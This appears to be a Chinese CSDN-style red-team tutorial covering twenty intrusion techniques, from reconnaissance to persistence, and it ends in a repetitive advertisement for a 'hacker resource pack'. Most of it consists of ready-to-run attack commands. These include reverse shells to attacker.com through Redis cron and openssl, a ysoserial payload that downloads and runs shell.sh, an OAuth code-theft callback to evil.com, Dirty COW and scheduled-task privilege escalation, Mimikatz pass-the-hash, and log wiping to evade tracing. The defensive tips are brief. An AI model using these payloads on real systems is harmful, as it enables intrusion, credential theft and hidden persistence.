在瞬息万变的网络安全领域,边界渗透是红队评估中至关重要的环节。本文以ATT&CK框架为理论基石,结合实战经验,深度剖析20个经过实践检验的渗透技巧,覆盖从信息搜集到权限维持的全过程。每个技巧均配备实用工具链、详细操作步骤以及针对性防御建议,助力安全从业者提升实战能力。
第一章:情报搜集深度挖掘
战术一:构建全方位子域名情报网
技术精要:
- 被动信息聚合:利用Amass进行高效被动信息收集:
amass enum -d example.com -config config.ini -o amass_results.txt
务必在配置文件中集成VirusTotal、Censys等API密钥,从而显著提高扫描的深度和广度。
- 证书透明度日志的深度挖掘:
import requests
target = "example.com"
url = f"https://crt.sh/?q=%.{target}&output=json"
resp = requests.get(url).json()
domains = {item['name_value'] for item in resp}
防御策略:
- 部署CertStream证书透明度监控工具,实时掌握证书签发动态。
- 杜绝DNS泛解析,并配置完善的DNS监控告警机制,及时发现异常。
战术二:揭秘CDN背后的真实IP
技术要点:
- IPv6穿透:巧妙利用IPv6基础设施的盲点:
curl -6 http://target.com # 探测CDN是否覆盖IPv6
nmap -6 -Pn -sV --script=http-title target_ipv6
- 邮件服务关联分析:通过邮件服务反查IP:
SELECT mx_records FROM domain_db WHERE domain='example.com'
UNION SELECT historical_ips FROM ssl_cert_db WHERE org_name='Example Inc.'
实战案例:2022年,某知名电商平台通过分析MX记录成功溯源到CDN背后的真实IP,有效绕过云WAF的防护。
战术三:非标准端口服务指纹精确定位
技术升级:
- 混合扫描策略:
masscan -p1-65535 10.0.0.0/24 --rate=100000 | tee masscan.out
nmap -sV -sC -Pn -T4 -iL masscan.out -oA nmap_service_scan
- 深度协议解析:
from scapy.all import *
packet = sniff(filter="tcp port 8443", count=10)
hexdump(packet[0].load) # 识别自定义加密协议特征
战术四:云环境元数据服务攻防
攻击路径:
- AWS元数据信息刺探:
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
- SSRF漏洞的深度利用,获取临时安全凭证:
GET /vulnerable?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
防御强化:
// AWS IMDSv2配置
{
"HttpTokens": "required",
"HttpPutResponseHopLimit": 1
}
战术五:构建企业员工信息社工库
数据来源:
- LinkedIn高级语法:
site:linkedin.com/in "Example Corp" - GitHub敏感信息扫描:
gitleaks detect --source=. -v
第二章:漏洞利用深度挖掘
战术六:Web应用历史漏洞挖掘
Wayback Machine深度利用:
- 时间线回溯分析:
import wayback
url = "example.com"
snapshots = wayback.WaybackClient().search(url)
for snapshot in snapshots:
print(snapshot.timestamp, snapshot.url)
- 敏感目录爆破:
wfuzz -c -z file,wordlist/general.txt --hc 404 https://web.archive.org/web/20200101/http://example.com/FUZZ
战术七:SSRF漏洞的链式攻击
云环境下的组合攻击:
- 阿里云Metadata利用:
GET /ssrf.php?url=http://100.100.100.200/latest/meta-data/ HTTP/1.1
- 内网Redis提权:
redis-cli -h 172.16.0.12 flushall
echo -e " */1 * * * * /bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1 " | redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
战术八:OAuth 2.0配置缺陷利用
攻击流程:
- 伪造恶意回调地址:
GET /oauth/authorize?response_type=code&client_id=CLIENT_ID&redirect_uri=http://evil.com/callback
- 窃取Authorization Code:
from flask import request
@app.route('/callback')
def callback():
code = request.args.get('code')
requests.post('https://oauth.provider/token', data={
'code': code,
'client_secret': 'STEALED_SECRET'
})
战术九:API未授权访问漏洞利用
Swagger文档的妙用:
- 接口枚举:
curl -s https://api.example.com/v2/api-docs | jq '.paths'
- 探测敏感操作:
POST /api/v1/admin/users HTTP/1.1
{"username":"attacker","role":"superadmin"}
战术十:反序列化漏洞深度利用
ysoserial高级用法:
java -jar ysoserial.jar CommonsCollections5 'curl http://attacker.com/shell.sh | bash' > payload.bin
curl -X POST --data-binary @payload.bin http://vuln-app.com/deserialize
防御之道:
- 启用SafeObjectInputStream,严格控制反序列化过程。
- 配置SerialKiller,构建可靠的过滤链。
战术十一:容器逃逸技术实战
Docker逃逸:
- 特权模式下的逃逸:
docker run --privileged -it alpine
nsenter --target 1 --mount --uts --ipc --net --pid
- CVE-2021-30465漏洞利用:
./cdk run shim-pwn 8080
第三章:权限提升高级技巧
战术十二:Windows服务路径劫持
自动化检测:
Get-WmiObject win32_service | Where-Object {
$_.PathName -match '".*?"' -and
(Test-Path -Path ($_.PathName -split '"')[1])
} | Select Name,PathName
安全加固:
icacls "C:Program Files" /deny "Everyone:(OI)(CI)(D,DC)"
战术十三:Linux SUID提权
快速检测:
find / -perm -4000 2>/dev/null | xargs -l ls -la
脏牛漏洞:
./dirtyc0w /etc/passwd "attacker:x:0:0:root:/root:/bin/bash "
战术十四:Windows计划任务劫持
实战演练:
- 检测可写目录:
accesschk.exe -wvcu "C:WindowsSystem32Tasks"
- 创建恶意XML任务:
<?xml version="1.0"?>
<Task><Actions><Exec>
<Command>cmd.exe</Command>
<Arguments>/c net user attacker P@ssw0rd! /add</Arguments>
</Exec></Actions></Task>
战术十五:云实例Metadata提权
AWS临时凭证:
AWS_ACCESS_KEY_ID=AKIA... AWS_SECRET_ACCESS_KEY=... aws ec2 describe-instances
第四章:横向渗透深度探索
战术十六:Pass-the-Hash攻击
Mimikatz实战:
sekurlsa::pth /user:Administrator /domain:corp /ntlm:e45e... /run:cmd.exe
防御与检测:
- 启用Credential Guard,保护凭据安全。
- 监控Event ID 4624,重点关注登录类型。
战术十七:Kerberoasting攻击
自动化脚本:
Get-DomainUser -SPN | Request-SPNTicket -OutputFormat Hashcat
黄金票据防御:
Set-ADAccountPassword -Identity krbtgt -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "新密码" -Force)
战术十八:RDP中间人攻击
Seth工具:
python seth.py eth0 3389 attacker_ip target_ip
第五章:权限维持持久战
战术十九:隐蔽后门植入
Linux:
nohup mkfifo /tmp/.x; /bin/sh -i </tmp/.x 2>&1 | openssl s_client -quiet -connect attacker.com:443 >/tmp/.x &
Windows WMI事件订阅:
$filterArgs = @{...}
$consumerArgs = @{CommandLineTemplate="powershell -enc JABzA..."}
战术二十:日志清除反追踪
Windows:
wevtutil cl Security /r:dc01.corp.com
Linux:
find /var/log -type f -exec sed -i '/192.168.1.100/d' {} ;
第六章:构建企业安全防线
企业安全建议
- 网络微分段:
interface GigabitEthernet0/1
switchport mode private-vlan
- EDR行为监控:
# Elastic检测规则示例
alert:
when:
process.name: "mimikatz.exe"
severity: CRITICAL
黑客/网络安全学习包
资料目录
-
成长路线图&学习规划
-
配套视频教程
-
SRC&黑客文籍
-
护网行动资料
-
黑客必读书单
-
面试题合集
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
1.成长路线图&学习规划
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
2.视频教程
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
3.SRC&黑客文籍
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦!
4.护网行动资料
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
5.黑客必读书单
**
**
6.面试题合集
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
更多内容为防止和谐,可以扫描获取~
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*********************************